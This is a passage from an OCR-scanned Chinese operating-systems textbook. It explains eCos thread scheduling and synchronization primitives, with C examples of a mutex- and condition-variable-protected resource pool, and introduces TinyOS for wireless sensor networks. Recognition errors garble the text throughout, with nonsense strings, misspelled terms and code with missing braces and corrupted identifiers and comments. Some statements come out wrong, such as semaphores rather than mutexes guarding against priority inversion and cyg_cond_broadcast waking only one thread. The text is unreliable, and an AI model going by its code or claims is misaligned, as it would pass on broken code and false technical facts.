先 级 更 低 的 线程 。 当 一 个 线程 挂 起 时 ,调度 高 优先 级 处 于 准备 状态 的 线程 。 一 个 线程 可 能 由 于 在 
同步 原 语 上 阻塞 、 被 中 断 或 是 放弃 控制 而 被 挂 起 。 因 为 在 每 个 优先 级 上 至 多 只 有 一 个 线程 ,所 以 
调度 程序 无 须 决定 在 给 定 的 优先 级 中 下 次 待 调度 的 线程 。 

位 图 调度 可 配置 为 8、16 或 32 个 优先 级 。 为 准备 执行 的 线程 准备 一 个 简单 的 位 图 。 为 了 做 
出 调度 决定 ， 调 度 程序 只 需要 确定 该 位 图 的 最 高 为 1 的 位 的 位 置 即 可 做 出 调度 决策 。 
多 级 队列 调度 

同位 图 调度 一 样 ， 多 级 队列 调度 也 支持 32 个 优先 级 。 多 级 队列 调度 在 每 个 优先 级 上 人 允许 有 
多 个 活动 的 线程 ， 其 线程 数目 仅 受 系统 资源 限制 。 

图 13.7b 描述 了 多 级 队列 调度 。 图 中 的 数据 结构 代表 了 每 个 优先 级 中 线程 的 数目 。 当 一 个 阻 
塞 的 线程 变 为 准备 运行 状态 时 , 它 可 以 抢占 更 低 优先 级 的 线程 。 同 位 图 调度 一 样 ,一 个 正在 运行 
的 线程 可 能 由 于 在 同步 原 语 上 阻塞 、 中 断 或 是 放弃 控制 而 被 挂 起 。 当 一 个 线程 被 阻塞 , 调度 程序 
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首先 确定 是 否 有 一 个 或 多 个 与 该 阻塞 线程 有 相同 优先 级 的 线程 处 于 就 绪 状 态 , 如 果 确 实 如 此 , 调 
度 程序 选择 该 队列 最 前 面 的 一 个 进行 调度 。 否则 , 调度 程序 寻找 比 当前 优先 级 低 的 最 高 优先 级 中 
的 一 个 或 多 个 准备 状态 的 线程 并 且 派 送 一 个 线程 。 

另外 ,多 级 队列 调度 可 以 配置 为 时 间 片 调度 。 这 样 的 话 ， 如 果 一 个 线程 正在 运行 ,并 且 同 时 
有 一 个 或 多 个 准备 状态 的 相同 优先 级 的 线程 ， 调 度 程序 将 在 一 个 时 间 片 结束 后 挂 起 当前 运行 进 
E, 并 且 选 择 同 优先 级 队列 中 的 下 一 个 线程 。 这 个 轮转 策略 只 在 同一 优先 级 中 进行 。 并 非 所 有 的 
应 用 程序 都 需要 时 间 片 调度 。 例如 , 一 个 应 用 程序 可 以 保存 只 是 因为 相同 原因 而 有 规律 地 被 阻塞 
的 线程 。 对 于 这 些 应 用 程序 ， 用 户 可 以 禁止 时 间 片 ， 这 会 减 小 由 于 定时 器 中 斯 导致 的 开销 。 


13.3.4 eCos 线程 同步 


可 以 为 eCos 内 核 配置 六 种 线程 同步 机 制 中 的 一 种 或 多 种 .这 些 同 步 机 制 包括 经 典 的 同步 机 制 : 
互 斥 量 、 信 号 量 和 条 件 变量 。 此 外 ，eCos 支持 两 个 同步 /通信 机 制 ， 这 在 实时 系统 中 很 常见 ， 也 
就 是 事件 标志 和 信箱 。 最 后 ，eCos 内 核 支持 自 旋 锁 ， 这 在 SMP ( 对 称 多 处 理 机 ) 系统 中 很 有 用 。 


位 图 调度 队列 


最 高 优先 级 31 






a) 位 图 调度 程序 的 线程 操作 
多 级 调度 队列 
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b ) 多 级 队列 调度 程序 的 线程 操作 
图 13.7 eCos 调度 操作 
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HRE 

AR (RRM) 已 经 在 第 6 章 介 绍 过 了 。 回 想 一 下 , 互 斥 量 用 于 强制 互 斥 访问 资源 ， 在 同 
一 时 间 只 有 一 个 线程 允许 获得 访问 权 。 互 斥 量 只 有 两 种 状态 : 加 锁 和 解锁 。 这 与 二 元 信号 量 有 些 
类 似 : 当 一 个 线程 锁 住 一 个 互 斥 量 后 ， 其 他 试图 锁 住 互 斥 量 的 线程 被 阻塞 ; 当 互 斥 量 解锁 后 ,在 
此 互 斥 量 上 被 阻塞 线程 的 其 中 之 一 解除 阻塞， 并 且 人 允许 加 锁 互 斥 量 以 及 获取 资源 访问 权 。 

互 斥 量 在 两 方面 不 同 于 二 元 信号 量 。 首先 , 给 互 斥 量 加 锁 的 线程 必须 给 互 斥 量 解锁 。 相 比 之 
下 ,二 元 信号 量 允 许 一 个 线程 加 锁 而 另 一 个 线程 为 其 解锁 。 另 一 处 不 同 之 处 是 信和 号 量 对 优先 级 反 
转 提供 保护 ， 而 信号 量 不 提供 保护 。 

ECos 内 核 可 以 配置 为 既 支 持 优先 级 继承 协议 又 支持 优先 级 置顶 协议 。 这 些 在 第 10 章 中 已 经 
介绍 过 。 
信号 量 

eCos 内 核 支 持 计数 信号 量 。 回 忆 下 第 5 章 ， 计 数 信号 量 是 一 个 整数 值 ， 用 于 为 线程 发 送信 
S. cyg_semaphore post 增加 信和 号 量 的 计数 器 的 值 。 如 果 计 数 器 的 新 值 小 于 或 等 于 0， 则 唤 
醒 一 个 在 此 信和 号 量 上 等 待 的 线程 。cyg_semaphore_wait 函数 检查 信号 量 计数 器 的 值 。 如 果 计 
数 器 为 0， 调用 此 毅 数 的 现场 将 等 待 信号 量 。 如 果 计 数 器 的 值 为 非 0， 计 数 器 的 值 减 少 并 且 线 程 
继续 执行 。 

计数 信号 量 适合 这 种 情况 ， 人 允许 线 程 一 直 等 待 直到 事件 发 生 。 事 件 可 以 由 生产 者 线程 产生 ， 
或 者 由 响应 硬件 中 断 的 DSR 产生 。 与 每 个 信和 号 量 相关 联 的 是 一 个 整数 计数 器 ， 该 计数 器 保存 着 
尚未 处 理 的 事件 的 数目 。 如 果 计 数 器 为 0， 等 待 该 信号 量 的 消费 者 线程 的 请 求 将 被 阻塞 ， 直 到 其 
他 的 线程 或 者 DSR 为 信号 量 递送 一 个 新 的 事件 。 如 果 计 数 器 的 值 比 0 大 ， 等待 信号 量 的 请 求 就 
会 消费 一 个 事件 ， 换言之, 减少 计数 器 的 值 ， 并 立即 返回 。 递送 一 个 信号 量 将 唤醒 正在 等 待 的 第 
一 个 线程 ， 该 线程 接 下 来 恢复 信号 量 的 等 待 操作 并 且 再 次 减少 计数 器 的 值 。 

信和 号 量 的 另 一 个 用 途 就 是 为 资源 管理 某 些 形式 。 计 数 器 与 当前 可 用 资源 的 类 型 的 数目 相符 
A, 以 及 等 待 在 该 信号 量 上 的 线程 对 于 资源 的 申请 和 再 次 递送 从 而 释放 该 资源 。 实 际 上 , 条 件 变 
量 对 类 似 的 操作 更 为 适合 。 
条 件 变量 

条 件 变量 用 于 阻塞 一 个 线程 , 直到 特定 的 条 件 为 真 。 条 件 变 量 与 互 斥 量 一 同 使 用 ， 允 许多 个 
线程 访问 共享 数据 。 它 们 可 用 于 执行 第 6 章 讨论 过 的 监控 管理 ( 见 图 6.14 )。 这 些 基 本 的 命令 如 
下 : 


cyg_cond wait 使 当前 线程 等 待 指定 的 条 件 变量 ， 同 时 对 与 该 条 件 变量 相关 联 的 互 斥 量 进 行 解 锁 
cyg_cond_signal 唤醒 在 此 条 件 变 量 上 等 待 的 一 个 线程 ， 使 该 线程 拥有 互 斥 量 
cyg_cond broadcast ”唤醒 在 此 条 件 变量 上 等 待 的 一 个 线程 ， 使 该 线程 拥有 互 斥 量 


在 eCos 中 ,条件 变量 与 互 斥 量 协同 使 用 的 典型 情况 是 完成 对 某 些 条 件 变 为 真 的 长 期 的 等 待 。 
我 们 可 以 用 [ECOS07] 中 的 一 个 例子 来 说 明 。 图 13.8 定义 了 一 组 函数 ， 以 便 使 用 互 斥 量 来 对 资源 
池 进 行 访问 控制 。 互 斥 量 用 于 分 配 和 释放 一 个 原子 池 中 的 资源 。res_tres_allocate MAM 
查 是 否 有 资源 的 一 个 或 多 个 单元 可 用 , WRA, 则 取出 一 个 单元 。 此 操作 受到 一 个 互 斥 量 的 保护 ， 
当 此 线程 控制 互 斥 量 时 , 就 不 能 有 其 他 线程 检查 或 者 改变 资源 池 。 函数 res_free (res_t res) 
允许 一 个 线程 释放 之 前 获取 资源 的 一 个 单元 。 另外, 此 操作 由 一 个 互 斥 量 来 完成 , 成 为 一 个 原子 
操作 。 : 

在 这 个 例子 中 ,如 果 一 个 线程 试图 访问 一 个 资源 但 却 没 有 可 用 的 资源 ,函数 返回 RES_NONE。 
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设想 一 下 , 实际 上 , 我 们 希望 线程 能 被 阻塞 并 且 等 待 , 直到 一 个 资源 变 得 可 用 ， 而 不 是 返回 一 个 
RES_NONE。 图 13.9 使 用 与 互 斥 量 相 关联 的 条 件 变量 来 完成 这 个 操作 。 当 res_allocate 检测 
到 没有 可 用 的 资源 , 它 将 调用 cyq_cond_wait. 后 者 对 互 斥 量 进 行 解锁 ,并 且 调 用 在 条 件 变量 
上 睡眠 的 线程 。 当 res_free 最 终 被 调用 时 ， 它 将 一 个 资源 放 回 资源 池 ， 并 且 调 用 
cyq_cond_signal 来 唤醒 任意 一 个 等 竺 在 条 件 变量 上 的 线程 。 当 等 待 的 线程 最 终 再 次 运行 时 ， 
它 将 在 cyq_cond_wait 返回 之 前 再 次 加 锁 互 斥 量 、 


Cyg_mutex_t res_ lock; 
res_t res pool [RES_MAX]; 
int res_count = RES MAX; 


void res_init (void) 

{ 
cyg_mutex_init(&res_lock) ; 
<fill pool with resources> 


} 
res_t res_allocate(void) 


{ 


res_t res; 
cyg_mutex_lock (&res_lock) ; // REIFE Bh 


if( res_count == 0 ) // 检查 空闲 资源 
res = RES_NONE; // 如 果 没 有 空闲 资源 返回 RES_NONE 


else 


res _count--; // 分 配 资源 
res = res_pool[res_count] ; 

} 

cyg_mutex_unlock(&res_lock); // 对 互 斥 量 解锁 


return res; 


void res_free(res_t res) 


{ 


cyg_mutex_lock(&res_lock) ; // 给 互 斥 量 加 锁 


res_pool [res_count] = res; // 释放 资源 
res_count++; 


eyg_mutex_unlock(&res_lock); // 对 互 斥 量 解 锁 





图 13.8 使 用 互 斥 量 对 资源 池 进 行 访 问 控制 


[ECOS07] 指 出 了 比较 重要 的 两 点 ， 以 及 一 般 情 况 下 条 件 变 量 的 使 用 。 首 先 ， 互 斥 量 解锁 和 
等 待 cyq_cond wait 是 原子 操作 : 在 解锁 到 等 待 期 间 没 有 其 他 线程 可 以 运行 。 如 果 不 是 原子 
操作 的 话 ， 由 其 他 线程 调用 的 res free 将 会 释放 资源 ， 但 是 这 样 就 会 丢失 对 cyq_cond_ 
signal 的 调用 ， 当 有 资源 可 用 时 ， 第 一 个 线程 就 会 结束 等 待 。 

第 二 个 特性 是 , 对 cyq_cond_wait 的 调用 是 在 一 个 while 循环 之 内 的 ,而 不 是 一 个 简单 
的 if 声明 。 这 是 因为 当 收 到 信号 的 线程 被 再 次 唤醒 时 , 需要 在 cyq_cond wait 中 再 次 对 互 斥 
量 进行 加 锁 。 依 靠 调度 程序 和 队列 顺序 , 许多 线程 可 以 在 该 线程 运行 之 前 进入 临界 区 。 因 此 它 等 
待 的 条 件 就 可 能 已 经 递送 了 false。 在 所 有 的 等 待 操作 的 条 件 变 量 中 使 用 循环 是 保证 条 件 在 等 
待 之 后 仍然 保持 true 的 唯一 方法 。 


事件 标志 
事件 标志 是 一 个 32 位 的 字 ， 作 为 一 个 同步 机 制 来 使 用 。 应 用 程序 的 代码 可 以 为 每 一 位 关联 
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一 个 事件 。 通 过 查询 相应 的 一 个 或 多 个 标志 位 ,线程 可 以 等 待 一 个 单独 的 事件 或 多 个 关联 的 事件 。 
在 所 有 需要 的 位 都 被 置 位 (AND) 或 者 有 一 个 位 被 置 位 (OR) 之 前 ,线程 处 于 阻塞 状态 。 根 据 
特定 的 条 件 或 事件 ， 一 个 发 信号 的 线程 可 以 设 定 或 者 再 设置 位 ， 从 而 相应 的 线程 被 阻塞 。 例 如 ， 
第 0 位 可 以 表示 一 个 特定 的 VO 操作 完成 , 使 数据 可 用 , 第 1 位 可 以 表示 用 户 按 了 启动 键 。 一 个 
生产 者 线程 或 DSR 可 以 将 这 两 个 位 置 位 ， 而 一 直 等 待 这 两 个 事件 的 消费 者 线程 被 唤醒 。 
cyg_mutex_t res_lock; 
cyg_cond_t res_wait; 
res_t res pool [RES MAX]; 
int res_count = RES_MAX; 
void res init (void) 
Cyg_mutex init(&res lock); 
cyg_cond_init(&res_ wait, &res_lock) ; 
<fill pool with resources> 


} 


res_t res allocate (void) 


{ 
res t res; 


cyg_mutex_lock(&res_lock) ; XEHE Fit Jn th 


while( res count == 0 ) 等 待 一 个 资源 
cyg_cond_wait (&res_wait); 


res_count--; 分 配 资源 


res = res_pool[res_count] ; 
cyg_mutex_unlock(&res_lock) ; Xt E DAA 


return res; 


} 


void res_free(res_t res) 
cyg_mutex_lock(&res_ lock) ; / 对 互 斥 量 加 锁 


res pooll[res count] = res; 释放 资源 
res_count++; 


cyg_cond_signal (&res_wait); / 唤醒 任何 等 待 的 分 配 符 


cyg_mutex_unlock(&res_lock); // ME RM 








13.9 ”使 用 互 斥 量 和 条 件 变 量 对 资源 池 进 行 访问 控制 


通过 使 用 cyq flag wait, 一 个 线程 可 以 等 待 一 个 或 多 个 事件 , 该 函数 有 三 个 参数 : 一 个 
特定 事件 的 标志 , 标识 中 相关 联 的 位 的 位 置 组 合 以 及 一 个 模式 参数 。 模 式 参数 指定 了 在 所 有 的 位 
HRM (AND) 或 者 至 少 一 个 位 被 置 位 ( OR ) 之 前 .线程 是 否 被 阻塞 。 模 式 参 数 也 可 以 指定 什 
么 时 候 等 待 完成 ， 全 部 事件 标识 被 清空 〈 全 部 设 定 为 0) 。 

言 箱 

信箱 ， 当 然 也 称 为 邮箱 ， 是 一 种 eCos 的 同步 机 制 ， 它 提供 两 个 线程 交换 信息 的 方法 。5.5 
节 进 行 了 一 个 关于 消息 传递 同步 的 一 般 性 讨论 。 在 这 里 ， 我 们 看 看 eCos 版 本 下 的 细节 。 

eCos 信箱 机 制 在 发 送 端 或 者 接收 端 都 可 以 配置 为 阻塞 或 非 阻塞 状态 。 对 一 个 给 定 的 信箱 ， 
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其 消息 队列 大 小 的 最 大 值 也 可 以 进行 配置 。 
发 送信 息 的 原 语 , KA put, 包括 两 个 参数 : 一 个 信箱 的 句柄 以 及 一 个 指向 消息 本 身 的 指针 。 
这 个 原 语 有 三 个 变量 : 


如 果 信 箱 中 有 一 个 空闲 的 柳 ， 新 消息 就 可 以 放 在 该 权 中 ; 如 果 有 一 个 等 待 的 线程 ， 将 
cyg_mbox put 唤醒 它 ， 这 样 该 线程 就 可 以 接收 消息 。 如 果 信 箱 正 好 满 了 ，cyg_mbox_put 就 会 阻塞 ， 
直到 有 一 个 相应 的 get 操作 使 一 个 槽 可 用 为 止 

如 果 有 一 个 空闲 的 槽 ， 则 类 似 于 cyg_mbox_put。 和 否则， 函数 会 在 一 个 指定 的 时 间 
期 限 中 等 待 ， 如 果 这 期 间 有 一 个 槽 可 用 ， 则 发 送 消 息 。 如 果 超 过 该 时 间 期 限 ， 操 作 返 
回 false。 也 就 是 说 ，cyg_mbox timedG_put 阻塞 的 时 间 小 于 或 等 于 一 个 指定 的 时 
Ve] fe) FS 

cyg_ mbox tryput 这 是 一 个 非 阻 塞 的 版 本 ， 当 消息 发 送 成 功 返 回 true， 当 信箱 满 时 返回 false 


同样 的 ， 对 于 get 原 语 ， 也 有 三 个 参数 : 


cyg_mbox timed put 


如 果 在 指定 的 信箱 中 有 一 条 未 决 的 消息 ，cyg_mbox get 返回 已 经 放 人 信箱 的 该 消 
息 。 和 否则 ， 函 数 将 一 直 阻 塞 ， 直 到 有 一 个 put 操作 
如 果 一 条 消息 可 用 则 立刻 返回 。 和 否则 ， 函 数 将 一 直 等 待 ， 直 到 一 条 消息 可 用 或 者 直到 
cyg mbox timed get 很 多 时 钟 周期 过 去 。 如 果 超 时 , 操作 返回 一 个 空 指针 。 也 就 是 说 , cyg_mbox_timed_get 
”阻塞 的 时 间 小 于 或 等 于 指定 的 时 间 间 隔 
这 是 一 个 非 阻塞 的 版 本 ， 如 果 消 息 可 用 它 返 回 一 条 消息 ， 如 果 信 箱 为 空 ， 则 返回 空 
指针 


cyg mbox get 


cyg_mbox_tryget 





自 旋 锁 

自 旋 锁 是 一 个 标志 位 , 一 个 线程 在 执行 一 段 特 定 的 代码 之 前 可 以 对 其 进行 检测 。 回 忆 一 下 第 
6 章 对 Linux 自 旋 锁 的 讨论 , 自 旋 锁 基 本 的 操作 是 : 同一 时 间 只 有 一 个 线程 能 够 获取 一 个 自 旋 锁 。 
任何 其 他 的 线程 试图 获取 该 自选 锁 将 被 保持 尝试 状态 ( 自 旋 ) ， 直 到 能 够 获取 该 自 旋 锁 为 止 。 实 
ELE, 自 旋 锁 就 是 建立 在 内 存 区 的 一 个 整数 上 , 任何 进程 进入 临界 区 之 前 都 要 检查 该 整数 。 如 果 
值 为 0， 线 程 将 设置 该 值 为 1， 并 且 进 入 临界 区 。 如 果 值 为 非 0， 线 程 就 会 一 直 检 查 该 值 ， 直 到 
它 为 0 为止。 

自 旋 锁 不 能 用 于 单 处 理 机 系统 ,这 就 是 Linux 为 什么 将 它 单独 编译 的 原因 。 作 为 一 个 有 风险 
的 例子 , 思考 一 下 在 可 抢占 调度 下 的 单 处 理 机 系统 , 一 个 高 优先 级 的 线程 试图 获取 一 个 低 优先 级 
已 经 掌控 的 自 旋 锁 。 因 为 高 优先 级 的 线程 抢占 了 低 优先 级 的 线程 , 低 优先 级 的 线程 不 能 执行 ,从 
而 结束 它 的 工作 并 释放 自 旋 锁 。 高 优先 级 的 线程 可 以 执行 但 却 一 直 陷 在 检查 自 旋 锁 中 。 在 SMP 
系统 中 ， 自 旋 锁 当前 的 用 户 可 以 继续 在 不 同 的 处 理 机 上 运行 。 


13.4 TinyOS 


‘5 — AT VE PRE REAL, tk Act Linux, eCos 为 退 入 式 操作 系统 提供 了 更 新 式 的 
方法 。 因 而 ， 对 内 存 、 处 理 时 间 、 实 时 响应 、 功 耗 等 要 求 较 严 格 的 情况 下 ，eCos 和 类 似 的 系统 
更 适合 此 类 情况 。TinyOS 系统 非常 精简 ， 为 嵌入 式 系统 提供 了 最 小 的 操作 系统 。 它 的 核心 操作 
系统 的 数据 和 代码 仅 需 要 400 个 字 节 的 内 存 。 

TinyOS 与 其 他 嵌入 式 操作 系统 有 着 显著 的 不 同 。 一 个 明显 的 不 同 之 处 是 TinyOS 不 是 实时 操 
作 系 统 。 这 个 是 因为 预期 的 工作 负载 的 原因 ， 该 工作 负载 主要 产生 在 无 线 传感器 网 络 上 下 文中 ， 
下 一 小 节 将 详细 描述 。 因 为 功 耗 的 原因 ， 这 些 设 备 大 部 分 时 间 是 关闭 的 。 应 用 程序 趋向 于 简单 ， 
处 理 器 的 抢占 也 不 再 是 问题 的 重点 。 
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At, TinyOS 没有 内 核 ， 这 是 因为 它 是 没有 存储 保护 ， 是 基于 组 件 的 操作 系统 ; 系统 中 没有 
进程 ; 操作 系统 本 身 也 没有 存储 分 配 系 统 ( 尽管 有 些 很 少 用 到 的 组 件 引 进 一 个 存储 分 配 系统 ); 中 
断 和 异常 处 理 依靠 外 围 设备 ; 并 且 它 是 完全 无 阻塞 的 ， 因 此 很 少 有 直接 同步 原 语 。 

TinyOS 已 经 成 为 一 个 实现 无 线 传 感 器 网 络 软件 的 流行 方法 。 目 前 ， 超 过 500 家 组 织 都 在 为 
TinyOS 开发 和 发 布 开 源 标准 。 


13.4.1 无 线 传感器 网 络 


TinyOS 最 初 是 为 使 用 较 少 的 无 线 传感器 网 络 而 开发 的 。 一 些 趋势 使 得 开发 极 紧凑 的 、 低 功 
耗 的 传感器 成 为 可 能 。 在 著名 的 摩尔 定律 驱使 下 , 存储 器 和 处 理 机 逻辑 部 件 的 尺寸 一 再 降低 。 更 
小 的 尺寸 减少 了 功 耗 。 在 无 线 通信 硬件 、 微 型 机 电 传感器 ( MEMS ) 和 传感器 中 ， 低 功 耗 和 小 尺 
寸 的 趋势 也 非常 明显 。 结 果 是 在 一 立方 毫米 内 ,开发 一 个 包含 逻辑 电路 的 完整 的 传感器 变 为 可 能 。 
应 用 软件 和 系统 软件 必须 足够 紧凑 ， 传 感 、 通 信和 计算 能 力 可 以 组 成 一 个 完整 但 是 微小 的 体系 
结构 。 

低 成 本 、 小 尺寸 、 低 功 耗 的 无 线 传感器 可 以 用 于 许多 应 用 中 [ROME04]。 图 13.10 展示 了 一 
个 典型 的 配置 。 一 个 基站 将 传感器 网 络 和 PC 主机 连接 起 来 ， 并 且 通 过 网 络 将 传感器 的 数据 传送 
到 PC 主机 上 ，, 该 主机 可 以 进行 数据 分 析 和 /或 通过 企业 网 或 因特网 向 分 析 服 务 器 传输 数据 。 单个 
的 传感器 搜集 并 传送 数据 到 基站 中 , 既 可 以 直接 传送 , 也 可 以 通过 数据 转播 的 方式 经 过 其 他 传 感 
器 传送 。 路 由 功能 是 必需 的 , 用 来 决定 怎样 转播 数据 , 以 便 通 过 传感器 网 络 到 达 基 站 。[BUON01] 
指出 , 在 许多 应 用 中 , 用户 希望 能 够 快速 布置 许多 低 成 本 的 设备 而 无 需 配 置 或 管理 它们 。 这 意味 
着 这 些 设 备 必须 能 将 自己 整合 人 一 个 特别 的 网 络 中 去 。 个 体 传感器 的 移动 性 和 射频 CRF) 接口 
意味 着 网 络 能 够 在 秒 的 数量 级 上 进行 重新 自 配 置 。 
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图 13.10 ”典型 的 无 限 传感器 网 络 技术 


13.4.2 TinyOS 的 目标 


考虑 到 微型 的 、 分 布 式 的 传感器 应 用 ， 伯 克利 大 学 的 一 个 研究 者 团队 [HILL00] 为 TinyOS 设 
定 了 下 列 目 标 : 
© 人 允许 高 并 发 性 : 在 一 个 典型 的 无 线 传感器 网 络 应 用 中 ， 设 备 要 求 有 强 并 发 性 。 几 个 不 同 
的 数据 流 必 须 保持 同步 移动 。 当 传感器 数据 在 一 个 稳定 的 流 中 输入 时 ， 处 理 结果 也 必须 
在 稳定 的 流 中 进行 传送 。 另 外 ， 必 须 管 理 对 遥控 传感器 和 基站 的 外 部 控制 。 
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© 在 有 限 的 资源 下 操作 : TinyOS 的 目标 平台 会 受到 存储 器 和 计算 资源 的 限制 ， 并且 人 靠 电池 
或 者 太阳 能 运行 。 一 个 单一 的 平台 可 能 仅仅 提供 几 K 字 节 的 程序 存储 器 和 几 百 字 节 的 随 
机 存储 器 ( RAM )。 软 件 必须 高 效 地 使 用 可 用 的 处 理 器 和 存储 器 资源 ， 并 且 人 允许 低 功 耗 
通信 。 
@ 适应 硬件 升级 : 硬件 始终 在 发 展演 化 ; 应 用 软件 和 大 部 分 系统 服务 必须 兼容 硬件 换代 。 
也 就 是 说 ， 如 果 功 能 相同 的 话 ， 应 该 可 以 在 升级 硬件 时 没有 或 者 只 有 很 少 的 软件 改变 。 
@ 支持 广泛 的 应 用 软件 : 应 用 软件 在 其 生命 周期 内 展示 了 很 广 的 需求 范围 , 通信 、 传 感 等 。 
因此 需要 模块 化 、 遂 用 的 戏 入 式 操作 系统 ， 以 便 在 开发 和 支持 软件 时 有 标准 化 的 方法 来 
节约 成 本 。 
@ 支持 不 同 的 平台 : 如 前 所 述 ， 需 要 通用 的 浇 入 式 操作 系统 。 
© LTH: 传感器 网 络 一 旦 部 署 ， 就 必须 在 无 人 监护 的 状态 下 运行 数 月 或 数 年 。 理 想 情 
况 下 ， 在 单一 的 系统 中 和 全 部 的 传感器 网 络 都 应 该 设计 宛 余 备 用 系统 。 实 际 上 ， 两 种 类 
型 的 元 余 都 需要 额外 的 资源 。 能 够 提高 可 靠 性 的 软件 的 特点 是 使 用 高 模块 化 、 标 准 化 的 
软件 组 件 。 
需要 详细 氢 述 并 发 的 需求 。 在 典型 的 应 用 中 , 可 能 会 有 几 打 、 几 百 个 甚至 几 千 个 传感器 连 成 
一 个 网 络 。 由 于 延迟 时 间 的 原因 ， 很 少 使 用 缓冲 。 例 如 ， 如果 每 隔 5 分 钟 采 样 一 次 ,并 且 希 望 在 
发 送 之 前 缓存 4 个 样本 ， 平 均 延 迟 时 间 就 是 10 分 钟 。 这 样 的 话 ， 信 息 通常 被 捕获 、 处 理 并 发 送 
到 网 络 中 去 ， 这 一 切 都 完成 在 一 个 连续 的 流 中 。 进 一 步 来 说 ， 如 果 传 感 器 采样 产生 很 大 的 数据 ， 
有 限 的 存储 器 可 用 空间 限制 了 可 被 缓存 的 采样 的 数目 。 虽然 如 此 , 在 一 些 应 用 中 , 每 个 流 包 括 很 
多 低级 别 的 事件 , 这 些 事件 与 高 级 别 的 处 理 交叉 在 一 起 。 一 些 高 级 别 的 处 理会 扩展 为 多 个 实时 事 
件 。 更 进一步 来 说 , 网络 中 的 传感器 ， 因 为 传输 的 低 功 耗 ， 通常 只 能 在 一 个 短 的 物理 范围 内 完成 
操作 。 从 外 部 传感器 传送 来 的 数据 必须 经 过 中 间 节 点 传递 到 一 个 或 多 个 基站 。 


13.4.3 TinyOS 的 组 件 


使 用 TinyOS 构建 一 个 嵌 人 式 系统 由 一 系列 的 小 模块 组 成 ， 称 为 组 件 ， 每 一 个 组 件 完成 一 个 
简单 的 任务 或 者 一 组 任务 , 每 个 组 件 与 其 他 组 件 和 硬件 的 接口 受到 一 定 限制 且 定 义 明 确 。 仅 有 的 
一 个 例外 的 软件 模块 是 调度 程序 , 稍 后 将 进行 讨论 。 实际 上 ， 因为 没有 内 核 , 也 就 没有 实际 的 操 
作 系 统 。 但 是 我 们 可 以 采用 下 面 的 观点 。 主 要 的 应 用 领域 是 无 线 传 感 器 网 络 (WSN )。 为 了 满足 
该 应 用 的 软件 需求 ， 就 需要 一 个 严格 的 、 包 含 各 种 组 件 简 化 的 软件 架构 。TinyOS 的 开发 团队 已 
经 完成 了 许多 开源 组 件 ， 这些 组 件 为 WSN 提供 了 所 需 的 基本 函数 。 这 些 标准 组 件 的 例子 包括 单 
跳 网 络 〈 single-hop networking )、 自 组 织 路 由 ( ad-hoc routing )、 电 源 管理 、 定 时 器 和 非 易 失 存 
储 控制 。 对 于 特定 的 配置 和 应 用 , 用 户 构建 额外 的 特殊 目的 的 组 件 , 连接 并 装 人 用 户 应 用 软件 的 
全 部 组 件 中 。TinyOS 由 一 系列 标准 化 组 件 组 成 。 对 于 任意 特定 的 实现 ， 并 非 所 有 的 组 件 都 能 用 
得 上 ,何况 还 有 一 些 用 户 编写 的 特定 应 用 的 组 件 。 上 述 实 现 中 的 操作 系统 仅仅 是 TinyOS 套件 中 
的 标准 组 件 简单 的 集合 。 

所 有 配置 在 TinyOS 中 的 组 件 有 着 相同 的 结构 ,图 13.11a 展示 了 一 个 例子 。 图 中 带 阴影 的 方 
框 表 示 组 件 , 该 组 件 作为 一 个 对 象 , 只 能 通过 定义 的 接口 进行 访问 , 这 些 接口 由 白色 的 方 框 表示 。 
组 件 可 以 是 硬件 或 软件 。 软件 组 件 由 nesC 实现 , nesC 是 C 语言 的 一 个 扩展 , 有 两 个 明显 的 特征 : 
通过 接口 与 组 件 进行 交互 的 编程 模型 和 带 有 从 运行 到 完成 任务 和 中 断 句柄 的 基于 事件 的 并 发 模 
型 ， 随 后 将 进行 讨论 。 

体系 结构 由 分 层 排列 的 组 件 构 成 。 每 个 组 件 仅 可 以 连接 其 他 两 个 组 件 ， 一 个 比 它 的 层次 低 ， 
一 个 比 它 的 层次 高 。 组 件 向 比 它 低层 的 组 件 发 出 命令 并 从 其 接收 事件 信号 。 类 似 地 , 组 件 从 比 它 
高 层 的 组 件 中 接收 命令 并 且 对 其 发 送 事件 信号 。 最 底层 的 级 别 是 硬件 组 件 , 最 顶层 的 级 别 是 应 用 
软件 组 件 ， 该 组 件 可 能 不 是 TinyOS 标准 套装 中 的 一 部 分 ， 但 必须 符合 TinyOS 组 件 的 结构 。 
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软件 组 件 执行 一 个 或 多 个 任务 。 每 个 组 件 内 的 任务 类 似 于 普通 操作 系统 中 的 线程 , 但 有 一 些 
限制 。 在 一 个 组 件 内 ， 任 务 是 原子 的 : 一 旦 任务 开始 执行 ， 就 要 运行 到 完成 。 在 相同 的 组 件 内 ， 
不 能 被 别 的 任务 抢占 , 也 没有 时 间 分 片 。 然 而 , 任务 可 以 被 事件 抢占 。 任务 不 能 阻塞 或 自 旋 等 待 。 
这 些 限 制 大 大 简化 了 组 件 内 的 调度 和 管理 。 只 有 一 个 简单 的 栈 ,分 配给 了 当前 运行 的 任务 。 任 务 
可 以 完成 计算 ,调用 低层 次 组 件 (命令 )， 向 高 层次 的 事件 发 送信 号 ， 还 可 以 调度 其 他 任务 。 

命令 是 不 可 阻塞 的 请 求 。 也 就 是 说 , 任务 发 送 了 一 条 命令 , 不 能 在 低层 次 的 组 件 回应 阻塞 或 
自 旋 等 待 。 命 令 一 般 是 让 低层 次 的 组 件 完成 某 些 服务 的 请 求 ， 比 如 初始 化 一 个 传感器 的 读 操作 。 
对 于 组 件 的 影响 来 说 , 接受 命令 的 组 件 的 效果 是 特定 于 给 定 命令 以 及 运行 该 命令 的 任务 的 。 — 
情况 下 ， 当 接收 到 一 条 命令 ， 其 后 的 执行 就 是 调度 任务 ， 因 为 命令 不 可 以 抢占 当前 运行 的 任务 。 
命令 立刻 返回 , 调用 组 件 ; 稍 后 ， 事 件 将 对 调用 组 件 发 送 完成 信号 。 也 就 是 说 ， 在 被 调用 的 组 件 
中 ， 命 令 不 会 导致 抢占 ， 在 调用 的 组 件 中 ， 命 令 不 会 导致 阻塞 。 





} 
uses interface Clock as Clk; 
} cee 


a) TimerM 组 件 


configuration Timerc { 
provides { 
interface StdControl; 
interface Timer; 
} 
} 


implementation { 
components TimerM, HWClock; 
StdControl = TimerN.stdCcontrol; 

Timer = Timery.Timer; 

TimerM.Clk -> HWClock.Clock; 





b) TimerC 配置 
图 13.11 组 件 和 配置 的 例子 


TinyOS 中 的 事件 可 以 直接 或 者 间接 地 与 硬件 事件 相关 联 。 最 低层 的 软件 组 件 接口 直接 对 应 
